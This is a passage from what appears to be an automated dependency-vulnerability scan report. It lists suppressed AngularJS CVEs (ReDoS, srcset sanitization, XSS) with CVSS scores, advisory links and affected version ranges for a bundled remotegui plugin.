- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2gqx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

[CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

[CVE-2024-8372](#) suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

#### Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*

- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*.\*

#### **CVE-2024-8373** suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqm9-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*.\*

#### **CVE-2025-2336** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaXx/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

#### References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

#### Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

#### Unscored:

- Severity: low

#### References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

#### Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021** (RETIREJS) suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

#### Unscored:

- Severity: low

#### References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

#### Vulnerable Software & Versions (RETIREJS):

### remotegui.zip: angular-cookies.jar: angular-cookies.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-cookies.jar/META-INF/resources/webjars/angular-cookies/1.8.3/angular-cookies.js

**MD5:** e17187aea1f0e6dbd25722e34b754915

**SHA1:** 20f43f716b9fef7d72537bc1b0e5aa2bc480cee5

**SHA256:** f3291c552042f6d0c500167769912a78ab3ecec9917128b2d6ea8e7c6714bb97

**Referenced In Project/Scope:** server

#### Evidence



#### Suppressed Identifiers



- None

## Suppressed Vulnerabilities

### [CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in `posPre: ''.repeat()` of `NUMBER_FORMATS.PATTERNS[1].posPre` with a very high value.

**Note:** 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:-:\*:\*:\*:\*

### [CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the `ng-srcset` directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to `@angular/core` (<https://www.npmjs.com/package/@angular/core>).



## CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

[CVE-2022-25869](#) suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSCORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

## [CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

## [CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qgx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

#### [CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

#### [CVE-2024-8372](#) suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status).

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:vsphere:\*
